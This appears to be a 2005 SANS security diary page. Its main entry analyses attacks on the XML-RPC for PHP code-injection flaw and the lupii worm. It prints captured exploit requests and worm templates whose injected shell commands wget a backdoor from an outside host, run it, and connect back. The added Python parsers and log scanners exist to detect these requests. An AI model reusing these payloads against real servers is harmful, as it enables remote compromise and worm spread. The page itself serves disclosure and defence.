XML-RPC for PHP Vulnerability Attack

Published: 2005-11-05. Last Updated: 2005-11-07 08:25:28 UTC
by Koon Yaw Tan (Version: 1)
We have received a few reports of an attack exploiting the XML-RPC for PHP vulnerability.

XML-RPC for PHP is used in a large number of popular web applications such as PostNuke, Drupal, b2evolution, Xoops, WordPress, PHPGroupWare and TikiWiki. The flaw (CVE-2005-1921) is a PHP code injection: the library builds PHP source from text nodes in the request and passes it to eval(), so a crafted value can close the quoted string it is placed in and run arbitrary PHP, and through it arbitrary shell commands, as the web server user. Most of these packages have the fix in their latest version; if you are still running an old version, update immediately.

From the submitted logs, the injected PHP runs a shell command that changes to /tmp, fetches a remote-access Trojan ("cback") with wget from one host, marks it executable and launches it with a second host and port 8080 as arguments, so the compromised server connects out to that second site via port 8080.

Sample log (hex dump of the captured POST; the submitter masked the IP octets with "xx"):
000 : 50 4F 53 54 20 2F 70 68 70 67 72 6F 75 70 77 61   POST /phpgroupwa
010 : 72 65 2F 78 6D 6C 72 70 63 2E 70 68 70 20 48 54   re/xmlrpc.php HT
020 : 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32 xx 2E   TP/1.1.Host: xx.
030 : xx xx xx 2E 39 34 2E 32 32 32 0A 43 6F 6E 74 65   xxx.94.222.Conte
040 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78 6D   nt-Type: text/xm
050 : 6C 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68   l.Content-Length
060 : 3A 32 36 39 0A 0A 3C 3F 78 6D 6C 20 76 65 72 73   :269..<?xml vers
070 : 69 6F 6E 3D 22 31 2E 30 22 3F 3E 3C 6D 65 74 68   ion="1.0"?><meth
080 : 6F 64 43 61 6C 6C 3E 3C 6D 65 74 68 6F 64 4E 61   odCall><methodNa
090 : 6D 65 3E 74 65 73 74 2E 6D 65 74 68 6F 64 3C 2F   me>test.method</
0a0 : 6D 65 74 68 6F 64 4E 61 6D 65 3E 3C 70 61 72 61   methodName><para
0b0 : 6D 73 3E 3C 70 61 72 61 6D 3E 3C 76 61 6C 75 65   ms><param><value
0c0 : 3E 3C 6E 61 6D 65 3E 27 2C 27 27 29 29 3B 65 63   ><name>',''));ec
0d0 : 68 6F 20 27 5F 62 65 67 69 6E 5F 27 3B 65 63 68   ho '_begin_';ech
0e0 : 6F 20 60 63 64 20 2F 74 6D 70 3B 77 67 65 74 20   o `cd /tmp;wget
0f0 : xx xx xx 2E xx xx xx 2E 32 35 35 2E 34 34 2F 63   xxx.xxx.255.44/c
100 : 62 61 63 6B 3B 63 68 6D 6F 64 20 2B 78 20 63 62   back;chmod +x cb
110 : 61 63 6B 3B 2E 2F 63 62 61 63 6B 20 xx xx 2E xx   ack;./cback xx.x
120 : xx 2E xx xx xx 2E 31 34 20 38 30 38 30 60 3B 65   x.xxx.14 8080`;e
130 : 63 68 6F 20 27 5F 65 6E 64 5F 27 3B 65 78 69 74   cho '_end_';exit
140 : 3B 2F 2A 3C 2F 6E 61 6D 65 3E 3C 2F 76 61 6C 75   ;/*</name></valu
150 : 65 3E 3C 2F 70 61 72 61 6D 3E 3C 2F 70 61 72 61   e></param></para
160 : 6D 73 3E 3C 2F 6D 65 74 68 6F 64 43 61 6C 6C 3E   ms></methodCall>
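As an added example (not code from the diary or from any of the affected projects), the following Python script reconstructs the request from a hex dump in the format above, keeping the submitter's "xx" masking as placeholder bytes so offsets stay exact, and then pulls out what an analyst wants from it: the requested path and XML-RPC method, the text node that breaks out of the eval()'d string, the shell command inside the backticks, the wget target, and the host and port the dropped binary is run with. It also compares the declared Content-Length with the body actually captured; here they differ (269 declared, 266 present), which fits the lupii strings further down carrying "Content-Length:269" as a fixed literal. The injection heuristic is this example's own, not the Snort rule.

```python
import re

# Constructed sample input: the hex dump published above, with the
# submitter's "xx" masking of IP octets left in place.
HEXDUMP = """\
000 : 50 4F 53 54 20 2F 70 68 70 67 72 6F 75 70 77 61   POST /phpgroupwa
010 : 72 65 2F 78 6D 6C 72 70 63 2E 70 68 70 20 48 54   re/xmlrpc.php HT
020 : 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20 32 xx 2E   TP/1.1.Host: xx.
030 : xx xx xx 2E 39 34 2E 32 32 32 0A 43 6F 6E 74 65   xxx.94.222.Conte
040 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78 6D   nt-Type: text/xm
050 : 6C 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68   l.Content-Length
060 : 3A 32 36 39 0A 0A 3C 3F 78 6D 6C 20 76 65 72 73   :269..<?xml vers
070 : 69 6F 6E 3D 22 31 2E 30 22 3F 3E 3C 6D 65 74 68   ion="1.0"?><meth
080 : 6F 64 43 61 6C 6C 3E 3C 6D 65 74 68 6F 64 4E 61   odCall><methodNa
090 : 6D 65 3E 74 65 73 74 2E 6D 65 74 68 6F 64 3C 2F   me>test.method</
0a0 : 6D 65 74 68 6F 64 4E 61 6D 65 3E 3C 70 61 72 61   methodName><para
0b0 : 6D 73 3E 3C 70 61 72 61 6D 3E 3C 76 61 6C 75 65   ms><param><value
0c0 : 3E 3C 6E 61 6D 65 3E 27 2C 27 27 29 29 3B 65 63   ><name>',''));ec
0d0 : 68 6F 20 27 5F 62 65 67 69 6E 5F 27 3B 65 63 68   ho '_begin_';ech
0e0 : 6F 20 60 63 64 20 2F 74 6D 70 3B 77 67 65 74 20   o `cd /tmp;wget
0f0 : xx xx xx 2E xx xx xx 2E 32 35 35 2E 34 34 2F 63   xxx.xxx.255.44/c
100 : 62 61 63 6B 3B 63 68 6D 6F 64 20 2B 78 20 63 62   back;chmod +x cb
110 : 61 63 6B 3B 2E 2F 63 62 61 63 6B 20 xx xx 2E xx   ack;./cback xx.x
120 : xx 2E xx xx xx 2E 31 34 20 38 30 38 30 60 3B 65   x.xxx.14 8080`;e
130 : 63 68 6F 20 27 5F 65 6E 64 5F 27 3B 65 78 69 74   cho '_end_';exit
140 : 3B 2F 2A 3C 2F 6E 61 6D 65 3E 3C 2F 76 61 6C 75   ;/*</name></valu
150 : 65 3E 3C 2F 70 61 72 61 6D 3E 3C 2F 70 61 72 61   e></param></para
160 : 6D 73 3E 3C 2F 6D 65 74 68 6F 64 43 61 6C 6C 3E   ms></methodCall>
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def dump_to_bytes(dump, mask=ord("x")):
    """Rebuild raw bytes from an 'OFFSET : <16 hex bytes>   <ascii>' dump.

    Bytes the submitter redacted as 'xx' become the placeholder byte, so every
    offset and length in the reconstruction stays exact."""
    out = bytearray()
    for line in dump.splitlines():
        if " : " not in line:
            continue
        _offset, rest = line.split(" : ", 1)
        for tok in rest.split()[:16]:            # at most 16 bytes per row
            if tok.lower() == "xx":
                out.append(mask)
            elif HEX_BYTE.match(tok):
                out.append(int(tok, 16))
            else:                                 # short row: ASCII column reached
                break
    return bytes(out)


def split_request(raw):
    """Return (request line, lower-cased header dict, body).  This capture
    uses bare LF line endings rather than CRLF, so accept either."""
    sep = re.search(rb"\r?\n\r?\n", raw)
    if sep is None:
        raise ValueError("no header/body separator in request")
    head, body = raw[:sep.start()], raw[sep.end():]
    lines = [l.rstrip(b"\r").decode("latin-1") for l in head.split(b"\n")]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


# A text node that closes a quoted literal and a call ("',''));") is trying
# to escape the PHP string the vulnerable library hands to eval().
BREAKOUT = re.compile(r"""^\s*['"][^;]*\)\s*;""")
PHP_MARKERS = re.compile(
    r"`[^`]+`"                                   # shell command substitution
    r"|\b(?:eval|system|passthru|shell_exec|exec|exit)\b"
    r"|/\*"                                      # comments out the rest of the eval'd code
)


def looks_like_php_injection(text):
    if BREAKOUT.match(text):
        return True
    return ";" in text and PHP_MARKERS.search(text) is not None


def extract_callback(text):
    """'./binary host port' -> (binary, host, port): where the dropper connects."""
    m = re.search(r"\./(\S+)\s+([\w.]+)\s+(\d{1,5})\b", text)
    return (m.group(1), m.group(2), int(m.group(3))) if m else None


def analyse_request(raw):
    request_line, headers, body = split_request(raw)
    text = body.decode("latin-1")
    method = re.search(r"<methodName>(.*?)</methodName>", text, re.S)
    leaf_text = re.findall(r">([^<>]+)<", text)  # text nodes between tags
    return {
        "path": request_line.split()[1],
        "method_name": method.group(1) if method else "",
        # Declared vs. captured length: the lupii strings carry
        # "Content-Length:269" as a fixed literal, so these need not agree.
        "declared_length": int(headers.get("content-length", -1)),
        "actual_length": len(body),
        "injected_values": [t for t in leaf_text if looks_like_php_injection(t)],
        "shell_commands": re.findall(r"`([^`]*)`", text),
        "download_urls": re.findall(r"\bwget\s+([^\s;`]+)", text),
        "callback": extract_callback(text),
    }


if __name__ == "__main__":
    for key, value in analyse_request(dump_to_bytes(HEXDUMP)).items():
        print(f"{key:16} {value}")
```

Run it as a script to print the report; as a module, analyse_request() can be applied to any captured xmlrpc.php POST, masked or not.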

The following xmlrpc.php paths were requested:
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blogs/xmlrpc.php
/community/xmlrpc.php
/drupal/xmlrpc.php
/blog/xmlrpc.php
/services/xmlrpc.php
/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php

A scan from VirusTotal detects "cback" as:
Antivirus    Version     Update       Result
Fortinet     2.48.0.0    11.04.2005   Linux/Rev.B-bdr
Kaspersky    4.0.2.24    11.05.2005   Backdoor.Linux.Small.al
McAfee       4620        11.04.2005   Linux/BackDoor-Rev.b

We have earlier reported this observation.

Another submission, from Morten, contains a slightly different binary (lupii) that exploits the same vulnerability.

Some of the strings in this malware (lupii) are shown below. They contain the request templates for the infection vectors it uses (the XML-RPC for PHP injection, the AWStats configdir command injection and the WebHints/includer.cgi injections) together with the path lists it probes. Note how the first GET template avoids literal spaces: $IFS stands in for a space, and `echo$IFS"$IFS"` is used where the next character is a letter, which the shell would otherwise read as part of the variable name; the AWStats payload percent-encodes its spaces and slashes instead. The %s and %%20 sequences are printf format escapes in the binary, so %%20 reaches the wire as %20:
Port is in use
Operation pending
Unknown
webmaster@mydomain.com
.hlp
find / -type f
/proc
/dev
/bin
GET %s?|cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`xx.xx.193.244/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`xx.xx.193.244| HTTP/1.1

Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%20xx%%2exx%%2e193%%2e244%%2flupii%%3bchmod%%20%%2bx%%20lupii%%3b%%2e%%2flupii%%20xx%%2exx%%2e193%%2e244;echo%%20YYY;echo|  HTTP/1.1

Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*</name></value></param></params></methodCall>

/cgi-bin/
/scgi-bin/
/awstats/
/cgi-bin/awstats/
/scgi-bin/awstats/
/cgi/awstats/
/scgi/awstats/
/scripts/
/cgi-bin/stats/
/scgi-bin/stats/
/stats/
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgi
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi
/dev/null
Error: %s
Insufficient memory
%d.%d.%d.%d
Unable to execute command
127.0.0.1
Size must be less than or equal to 9216
Cannot packet local networks
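The request templates above are easier to spot in web-server logs once their encodings are undone. The following added example (not the diary's code and not the worm's) scans Apache combined-format access log lines, constructed here to mimic the worm's requests (client addresses, timestamps, sizes and status codes are made up; the binary's printf "%%" is written as the single "%" that reaches the wire, and embedded quotes are escaped the way Apache writes them). It percent-decodes the target, replaces $IFS and the `echo$IFS"$IFS"` sub-shell with spaces, and flags a CGI parameter whose value opens with a pipe together with the wget / chmod +x / ./ dropper chain. A POST to an xmlrpc.php path is only marked for body review, since the access log does not record the body.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines mimicking the worm's request
# templates plus one benign request.  Client IPs, timestamps, sizes and
# status codes are made up; the targets follow the strings above, with the
# binary's printf "%%" collapsed to "%" and embedded quotes escaped as \".
LOG = r"""
10.0.0.5 - - [05/Nov/2005:10:12:01 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2exx%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%20xx%2exx%2e193%2e244;echo%20YYY;echo| HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
10.0.0.5 - - [05/Nov/2005:10:12:02 +0000] "GET /cgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`xx.xx.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`xx.xx.193.244| HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
10.0.0.5 - - [05/Nov/2005:10:12:03 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.7 - - [05/Nov/2005:10:13:44 +0000] "GET /blog/index.php?p=12 HTTP/1.1" 200 8812 "-" "Mozilla/5.0 (X11; U; Linux i686) Gecko/20051025 Firefox/1.0.7"
"""

# Greedy request group: the request may itself contain quotes (logged as \"),
# so the split point is fixed by the status/size/referer/agent tail instead.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

IFS_SUBSHELL = '`echo$IFS"$IFS"`'      # the worm's space-without-a-space trick
PIPE_PARAM = re.compile(r"[?&](?:[\w.]+=)?\|")       # parameter value opens with '|'
DROPPER_CHAIN = re.compile(r"\bwget\s+\S+.*?\bchmod\s+\+x\b.*?\./\w+", re.S)
WGET_TARGET = re.compile(r"\bwget\s+([^\s;|`]+)")


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    request = m["req"].replace('\\"', '"')
    parts = request.split(" ")
    return {
        "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "ua": m["ua"],
        "method": parts[0], "target": parts[1] if len(parts) > 1 else "",
    }


def normalise(target):
    """Undo the encodings used to smuggle a shell pipeline through a URL:
    percent-encoding, $IFS in place of spaces, and the echo sub-shell used
    where a letter follows ($IFSlupii would be read as one variable name)."""
    s = unquote(target)
    s = s.replace(IFS_SUBSHELL, " ")
    return re.sub(r"\$\{?IFS\}?", " ", s)


def classify(method, target):
    path, _, _query = target.partition("?")
    norm = normalise(target)
    tags = []
    if method == "GET" and PIPE_PARAM.search(norm):
        tags.append("cgi-pipe-injection")       # awstats configdir / webhints style
    if DROPPER_CHAIN.search(norm):
        tags.append("dropper-chain")            # wget ... ; chmod +x ... ; ./...
    if method == "POST" and path.endswith("/xmlrpc.php"):
        tags.append("xmlrpc-post-review-body")  # body is not logged; inspect it elsewhere
    m = WGET_TARGET.search(norm)
    return {"path": path, "tags": tags, "dropper": m.group(1) if m else None}


def scan(log_text):
    """Return one record per suspicious request, with the decoded dropper URL."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        result = classify(entry["method"], entry["target"])
        if result["tags"]:
            result.update(ip=entry["ip"], ts=entry["ts"], status=entry["status"])
            hits.append(result)
    return hits


if __name__ == "__main__":
    for hit in scan(LOG):
        print(hit["ip"], hit["path"], hit["tags"], hit["dropper"])
```

The decoded dropper URL is the indicator worth blocking or hunting for across other hosts; the xmlrpc.php POSTs need the request body (a packet capture or a mod_security audit log) to confirm.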

<Update 1>
Luke has done a quick analysis of the lupii disassembly and found that it listens and communicates on UDP/7111, set up in its "audp_listen" function (confirmed with netstat). Assembly segment below:

804bca5: 68 c7 1b 00 00 push   $0x1bc7
804bcaa: 68 40 4b 05 08 push   $0x8054b40
804bcaf: e8 5b e1 ff ff call   8049e0f <audp_listen>

Note that $0x1bc7, pushed as an argument to audp_listen (under the x86 cdecl convention the first value pushed is the last parameter), is 7111 in decimal. Activity on this port may therefore indicate an infection.

The ISC port report for 7111 also shows a recent spike (UDP, on 3 Nov 05):
http://isc.sans.org/port_details.php?port=7111
</Update 1>

<Update 2>
Another reader reports a copy that listens on UDP 7222 instead:
1. Runs on RedHat Enterprise Workstation 4.
2. Opens up udp:7222.
3. Exchanges some info with <IP_address_of_the_reporting_host> over udp 7222.
4. Remains active in the background.
5. Starts a SYN scan to port 80 on random destinations; in this particular example it used a class A address, keeping the first 2 octets unchanged and changing just the last 2 octets of the address, in order from X.Y.0.0 to X.Y.z.w.
6. It doesn't seem to be downloading anything from the Internet.
7. It tries several ways to infect the scanned systems, all based on CGI command execution/code injection: awstats.pl, webhints, xml-rpc for php, etc.

The md5sums of the lupii copies received differ, so more than one variant is circulating:

c9cd7949a358434bfdd8d8f002c7996b  listens on UDP 7111
df0e169930103b504081aa1994be870d  listens on UDP 7222
31a1920b320cd52f684ffb984ef2b05a  listens on UDP 7222

The reader also points out that "lupii" is Romanian for "the wolves".
</Update 2>

<Update 3>
Antivirus vendors are starting to come out with signatures to detect this malware:
Symantec - Linux.Plupii
McAfee - Linux/Lupper.worm
CA - Linux/Lupper.A; Linux/Lupper.B
ClamAV - Exploit.Linux.Lupii (Scan result from Virus Total)
Kaspersky - Exploit.Linux.Small.x (Scan result from VirusTotal)

Thanks to Juha-Matti for pointing this out.
</Update 3>

You can find the details of the vulnerability at:
http://www.gulftech.org/?node=research&article_id=00088-07022005
http://www.securityfocus.com/bid/14088/
http://secunia.com/advisories/15852/

For a list of vulnerable applications, please refer to:
http://www.securityfocus.com/bid/14088/info
http://www.osvdb.org/17793

If you are running a vulnerable version, you are advised to upgrade immediately:
http://www.securityfocus.com/bid/14088/solution

If you are running Snort, the Snort ID is 3827 (WEB-PHP xmlrpc.php post attempt).

Thanks to Keith, Morten, Luke and many other readers for their submissions.

We will post updates when available. If you have any new findings or experience the same attack, do send us a note at our contact page.


Macromedia Flash Player Vulnerability

Published: 2005-11-05. Last Updated: 2005-11-06 02:40:44 UTC
by Koon Yaw Tan (Version: 1)
A vulnerability has been discovered in Macromedia Flash Player 7 and earlier versions which, when exploited, could lead to execution of arbitrary code. One possible attack vector is a malicious SWF file placed on a website.

If you have already upgraded to Flash Player 8, you are not affected by this vulnerability. Otherwise, upgrade as soon as possible.

http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html
http://www.securityfocus.com/bid/15332/

Affected version information, as listed by Macromedia:
Affected Software Versions: Flash Player 7.0.19.0 and earlier
Macromedia recommends all Flash Player 7 and earlier users upgrade to this new version, which can be downloaded from the Macromedia Player Download Center.

Podcast Interview with Marty Roesch

Published: 2005-11-05. Last Updated: 2005-11-05 11:16:48 UTC
by Koon Yaw Tan (Version: 1)
Paul has shared with us a recent interview with Marty Roesch, conducted at SANS Network Security 2005 in LA. Marty talks about the history of Snort, the recent Back Orifice pre-processor vulnerability and technologies at Sourcefire.

The interview can be found at:
http://pauldotcom.com/podcast/

There are other podcasts there too. Thanks Paul!

MS November Security Bulletin Advance Notification

Published: 2005-11-05. Last Updated: 2005-11-05 11:09:17 UTC
by Koon Yaw Tan (Version: 1)
Microsoft is planning to release one security bulletin affecting Microsoft Windows on 8 Nov 05. The highest Maximum Severity rating for this bulletin is Critical.

http://www.microsoft.com/technet/security/bulletin/advance.mspx

ClamAV 0.87.1 released, fixes multiple security vulnerabilities

Published: 2005-11-05. Last Updated: 2005-11-05 06:25:33 UTC
by Bojan Zdrnja (Version: 1)
Vulnerabilities in anti-virus programs seem to be popular lately. A new version of ClamAV, 0.87.1, has been released; it addresses several security vulnerabilities.

The most critical one allows remote attackers to execute arbitrary code by supplying a malformed file to a vulnerable ClamAV installation. The flaw is in the code that unpacks executables compressed with the FSG packer v1.33.

Besides this, the released version also fixes two DoS vulnerabilities published by iDefense.

Since ClamAV is often used to scan e-mail attachments on gateways, practically any user can send a malicious file that the gateway will parse. Although we have not yet had reports of exploits for this vulnerability, you should be proactive and install the new version.

The latest version can be downloaded from
http://prdownloads.sourceforge.net/clamav/clamav-0.87.1.tar.gz?download